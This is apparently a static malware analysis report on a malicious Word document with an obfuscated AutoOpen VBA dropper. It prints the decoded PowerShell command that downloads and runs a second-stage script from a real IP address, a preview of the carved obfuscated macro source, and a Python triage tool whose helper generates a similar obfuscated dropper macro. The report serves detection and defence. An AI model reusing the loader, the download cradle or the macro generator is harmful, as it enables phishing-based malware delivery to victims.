Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b94669b74ea10b34…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 100.2 KB
Created: 2018-07-05 09:33:00 (document metadata, attacker-controlled; not a trusted timestamp)
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 36e93c172f6945863414127265b7a706
SHA-1: 1f32f28b0a5bed4e6d9ebceda0b24198d7ff9b08
SHA-256: b94669b74ea10b348b3f74fb3236352bf715ec2be4916022d544ab24e26cce47
Risk score: 342

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The sample carries an obfuscated auto-exec VBA loader (rated critical) with CreateObject and Shell calls, the shape of a dropper. AutoOpen concatenates the return values of two functions (ObiqhtNwYz and AlCkEW), each assembled from dozens of short string fragments and Chr() calls interleaved with arithmetic junk lines, and passes the result to a procedure ffXjNuT whose body lies outside the previewed source and which presumably holds the decoder and the execution sink the heuristics flag. The reassembled string begins "wershell ((" followed by a comma-separated numeric character array, i.e. a PowerShell command whose body only exists after the decoder runs. The report identifies the decoded command as: powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://185.189.255.100/a.ps1')", which fetches and executes a second-stage script from that URL, so the document acts as a downloader. Note that this URL is produced by the decoder, not stored in the file: plain string extraction recovers only the DrawingML schema namespace listed under Embedded URL, so an indicator list built from extracted strings alone would miss the download location.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6602053-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6602053-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 5 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (a numeric char-array, repeated hex-string decoding, or Replace() removal of junk tokens) and feeds them to a COM-instantiation or execution sink. This loader shape keeps the CreateObject/Shell/URL indicators out of the readable macro source, so keyword and string-extraction rules alone underreport it. In this sample the char-array is built across the ObiqhtNwYz and AlCkEW functions and handed to ffXjNuT from AutoOpen.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    A procedure named AutoOpen runs automatically when the document is opened with macros enabled
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and ones whose source extraction fails, where no readable source is available; here it corroborates the source-level findings.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule's own text assumes that no modern VBA project was recovered and no stronger macro-virus family marker was present; that premise does not hold for this sample (a VBA project was extracted, see macros.bas below), so treat the marker only as a second, independent sign of auto-execution, not as a downloader or parser-CVE attribution.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body). This is the DrawingML namespace URI that Office writes into its own XML, not an attacker resource; the download URL named under Malware Insights is produced only by the macro's decoder at run time and is absent from the extracted strings.
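The triage logic that the Malware Insights summary and the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER finding describe, as an added example; it is not the report's rule engine and not oletools code. Given carved VBA source it folds the fragmented literals and Chr() calls back into the strings they hide, finds the auto-exec procedure and the call it feeds them to, lists the sinks visible in the text versus those that only exist in the reassembled strings, and brute-forces the numeric char-array on the assumption that the decoder is a single-byte XOR or subtraction. That assumption, the key 53, the macro built by build_sample_macro() and the placeholder URL example.invalid are all constructed here and not taken from the sample.

```python
import re

# Auto-exec entry points, execution/COM sinks and C2-looking markers (Word/Excel names only).
AUTOEXEC = re.compile(r"^\s*(?:Sub|Function)\s+(AutoOpen|AutoExec|AutoClose|Auto_Open|"
                      r"Document_Open|Document_Close|Workbook_Open)\b", re.I | re.M)
SINKS = re.compile(r"\b(Shell|CreateObject|GetObject|WScript\.Shell|Win32_Process|"
                   r"powershell|cmd\.exe|Run)\b", re.I)
MARKERS = re.compile(r"powershell|https?://|DownloadString|Invoke-\w+|\$\w+\s*=", re.I)
ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")
CALL = re.compile(r"^\s*(\w+)\s*\((.*)\)\s*$")
# string literal | Chr(n) | name or number | concat operator | whitespace | anything else
TOKEN = re.compile(r'"([^"]*)"|Chr\((\d+)\)|(\w+)|([+&])|\s+|(.)', re.I)

SAMPLE_KEY = 53  # constructed: the key the sample macro's char-array is XORed with
SAMPLE_COMMAND = "$w=New-Object Net.WebClient;IEX $w.DownloadString('http://example.invalid/stage2.ps1')"


def build_sample_macro(command=SAMPLE_COMMAND, key=SAMPLE_KEY):
    """Constructed macro in the shape of the carved macros.bas (junk arithmetic, fragmented
    literals, XOR-encoded numeric array, one call into a decoder sub). Not the report's artifact."""
    nums = ",".join(str(ord(c) ^ key) for c in command)
    frag = " + ".join('"%s"' % nums[i:i + 9] for i in range(0, len(nums), 9))
    return f'''Attribute VB_Name = "iIwBPoqiJJYi"
Sub AutoOpen()
On Error Resume Next
   wGwrVj = (29273 / NcMdsf * 63999 / UjUfFK)
ffXjNuT (ObiqhtNwYz + AlCkEW)
End Sub
Function ObiqhtNwYz()
On Error Resume Next
bZSlfYwil = "po" + "wers" + "hell " + Chr(40) + Chr(40)
PzYuO = YwZsM + 67650 - (Gqwadu / qSLSw)
bIdoD = {frag}
ObiqhtNwYz = bZSlfYwil + bIdoD
End Function
Function AlCkEW()
AlCkEW = Chr(41) + Chr(41)
End Function
Sub ffXjNuT(c)
Set o = CreateObject("WScript.Shell")
o.Run c, 0
End Sub
'''


SAMPLE_VBA = build_sample_macro()


def eval_string_expr(rhs, known):
    """Fold literals, Chr() calls and already-resolved names joined by + or & into one string;
    return None for anything else (arithmetic junk, bare numbers, calls)."""
    out = []
    for lit, ch, ident, op, other in TOKEN.findall(rhs):
        if other:
            return None
        if ch:
            out.append(chr(int(ch)))
        elif ident:
            if ident not in known:
                return None
            out.append(known[ident])
        elif not op:
            out.append(lit)
    return "".join(out)


def resolve_strings(vba):
    """Constant-propagate fragmented string assignments (in VBA a function's own name holds
    its return value) until no new name resolves."""
    known = {}
    while True:
        before = len(known)
        for line in vba.splitlines():
            m = ASSIGN.match(line)
            if m and m.group(1) not in known:
                value = eval_string_expr(m.group(2), known)
                if value is not None:
                    known[m.group(1)] = value
        if len(known) == before:
            return known


def decode_char_array(s):
    """Brute-force a single-byte XOR/SUB key over a comma-separated numeric array, scoring
    printability plus a C2-looking marker. This decoder shape is an assumption."""
    nums = [int(n) for n in re.findall(r"\d+", s)]
    if len(nums) < 16:
        return None
    best = None
    for key in range(256):
        for op in ("xor", "sub"):
            text = "".join(chr(((n ^ key) if op == "xor" else (n - key)) % 256) for n in nums)
            printable = sum(32 <= ord(c) < 127 for c in text) / len(text)
            score = printable + (1.0 if MARKERS.search(text) else 0.0)
            if best is None or score > best[0]:
                best = (score, op, key, text)
    return best


def triage(vba):
    """Auto-exec procs, sinks visible in the text, sinks hidden in reassembled strings,
    call sites fed with reassembled strings, and the best decoding of the char-array."""
    known = resolve_strings(vba)
    calls = []
    for line in vba.splitlines():
        m = CALL.match(line)
        if m and not ASSIGN.match(line):
            arg = eval_string_expr(m.group(2), known)
            if arg is not None:
                calls.append((m.group(1), arg))
    decoded = None
    for _, arg in calls:
        decoded = decoded or decode_char_array(arg)
    return {
        "autoexec": AUTOEXEC.findall(vba),
        "visible_sinks": sorted(set(SINKS.findall(vba))),
        "hidden_sinks": {k: SINKS.findall(v) for k, v in known.items() if SINKS.search(v)},
        "calls": calls,
        "decoded": decoded,
    }
```

Run triage() over the real macros.bas and the string reassembly and call-site reconstruction still apply, since they do not depend on the decoder guess: on the previewed portion they yield the "wershell ((" prefix and the numeric array behind it. The brute force only returns a convincing (score 2.0) tuple when the decoder really is a single-byte XOR or subtraction; a lower score means the array must be decoded by hand against the body of ffXjNuT instead.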

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                              | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7582 bytes
SHA-256: d1aaae11ed324321dcdee5ba79717c1d6d683f8c393af0540a5b56c9c1f98fe8

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "iIwBPoqiJJYi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   wGwrVj = (29273 / NcMdsf * 63999 / UjUfFK)
   dAVYY = (23985 / PzjfFP * 90995 / DWVzE)
   cvuks = (70482 / BJNDuM * 57042 / Ehujz)
   oWuAT = (68863 / ZlsAiO * 92825 / daSJl)
   HnJGm = (19196 / swEOb * 63576 / rzNSCt)
   SAnpcf = (83768 / LDaDwn * 22405 / qTIYSW)
ffXjNuT (ObiqhtNwYz + AlCkEW)
   JovRYA = (12553 / cwzwml * 31563 / iwVBls)
   RZMMEq = (47142 / dzRzbS * 7442 / uYoFH)
   SRobpc = (40618 / wZkNj * 72285 / zaTZu)
   QaSauG = (58262 / PMjAOO * 54485 / ijHwl)
End Sub


Attribute VB_Name = "uSAKVzYqUrIlz"
Function ObiqhtNwYz()
On Error Resume Next
dFWpLB = (10363 / KwtzBC)
   pidUG = (83329 / FSMVGv)
   BBKqiQ = (97441 / nksqml)
bZSlfYwil = "wers" + "hell    " + "         " + "     " + Chr(40) + Chr(40) + "21 ,99" + " , 75" + ",94,1" + "2 ,95 ,"
PzYuO = YwZsM + 67650 - (Gqwadu / qSLSw)
   dFVsoS = ksSYM + 87418 - (CXbTE / hrMGjB)
   lsOMnr = Vsudw + 42386 - (FzjGV / bBOjCH)
bIdoD = "84 , 70 ," + "28,9" + "4 ,83, 91" + " ,84" + " ,82" + " , 69 ,1" + "7 , 127" + ",84 ,"
iKfdkY = njdrO + 3159 - (DhioqD / jWjCh)
   oGzUim = LfZrw + 71209 - (DwfYLk / bLbJR)
   vWLNB = cVtOLM + 87859 - (QCjzi / YdzUbh)
fqKcDMvzip = "69, 31,1" + "02 ,84" + ", 83," + "114 ,93," + " 88 ," + " 84,9" + "5, 69,"
rmUHd = znIQBX + 12644 - (ClHXpq / rzXXjT)
   CMdEAu = Dvljnm + 20188 - (zKbrX / ZEjKal)
   owjzOD = EPzvU + 21931 - (tnqoA / XkPAT)
   waDvss = RiMbK + 66648 - (PcdJvS / CEwuo)
   EBDbl = srUjB + 80925 - (UMHXMi / TrXwa)
SLIqKiYnfq = "10,2" + "1 ,107 " + ", 103 " + ",112" + " ,12 ,2" + "2,89 , 6" + "9,69 , 6" + "5,11 ," + "30 ," + " 30 "
jddKPr = svakFw + 3890 - (BNuIn / YcNCc)
SEVjvPaW = ", 83 , " + "94,7" + "2 , 67," + "80 ,9" + "2, 94, " + "66 ,31 ,8" + "5,80,8"
PImjo = UQlGjA + 2071 - (mzkbor / aRBGX)
   ppqld = NHzFX + 93623 - (wzSru / VjKZn)
   aJzzOB = JbvYL + 32990 - (RmkbCZ / MqTQb)
   Sfinr = tTIpX + 35951 - (AAirC / Saqjp)
phTdzE = "6 , 66,31" + ", 68" + ",66 ," + " 30, 9" + "3 ,88,82," + "84, " + "95,66 ," + " 84,30 ,7" + "5,75 " + ",94,68 ," + "69 , 31 ," + "84 ,7"
iPDbZS = TVJivj + 63549 - (pVizQc / ijPKV)
   TncwtA = PEdWL + 11975 - (ECvGu / cUHzol)
   dIHkmk = aumnKk + 63135 - (cwJvbS / FozJWk)
RIzUwsiVAAz = "3, 84,11" + "3,89 ," + "69, 6" + "9,65,11 " + ", 30 ," + "30, 87, " + "93 ," + "94,6" + "8 ,6" + "7 , 88,6" + "6 ,89 ,87" + ", 67,"
zwosA = LzwDP + 50727 - (KFrbsE / AaWNz)
tqiutRYP = " 80, 86" + " ,67 , 8" + "0,95" + ", 82,84" + ",31,88 ," + " 95 , 30," + "70, 65,28" + " ,82" + " ,94 , " + "95,69,84" + ",95 , 69 " + ", 30"
atzEa = izLsY + 38466 - (vnGwcn / wKvuoq)
   cOEDiX = OwolFn + 24336 - (YDDIiu / usSwO)
AcPvoavbDMK = " , 68 , 6" + "5, 9" + "3 , 9" + "4,80 ,8" + "5 ,66 ,3" + "0, 75" + ",75 ," + "94, 68,69"
ObiqhtNwYz = bZSlfYwil + bIdoD + fqKcDMvzip + SLIqKiYnfq + SEVjvPaW + phTdzE + RIzUwsiVAAz + tqiutRYP + AcPvoavbDMK
   QzDPkJ = nbGQA + 2950 - (sSwQvK / SkKin)
   zIvOBm = Gkszi + 27331 - (ZFPkjO / UkHPTb)
   CzMslz = CMKoj + 56078 - (VuhNnM / mCfqV)
   klITp = voAMs + 31711 - (rLjKD / HlTTb)
   aQRhX = Ezlkc + 67481 - (mPETJ / wPSVD)
End Function
Function AlCkEW()
On Error Resume Next
whKuLD = jTlsVq + 79580 - (plLKv / GVRDzQ)
   BPLcFE = ahqcO + 19060 - (OIzKMz / GpXRc)
   oKdhbb = fhCGw + 58240 - (MRrGaD / mFRcur)
IamVKB = ", 31 , 8" + "4, 73" + ",84, " + "22 , 31," + " 98,65" + ",93 ," + "88 , " + "69 ,25 " + ", 22,11" + "3,22, 24,"
OmvJia = oPNCJ + 7327 - (EwPQJ / LqqrbC)
oWbzQ = " 10 ,2" + "1 ,87" + ",70 ," + " 97 " + ", 17 , 1" + "2,17 " + ", 22" + " ,8,"
hcVDj = dOXOUl + 86494 - (FXzHwc / lUHwZB)
   jjomp = TDVLlC + 7059 - (NBpizN / fbCujX)
ZEWbNj = " 4 , " + "9 ,22" + ",10,21 ," + "64 ,90, " + "85, 12," + " 21, 84 ," + " 95, 71" + ",11 "
JRWwni = wUJjm + 34310 - (dcmlV / wYYUOw)
rjUsUp = ",69 ,84 " + ", 92 
... (truncated)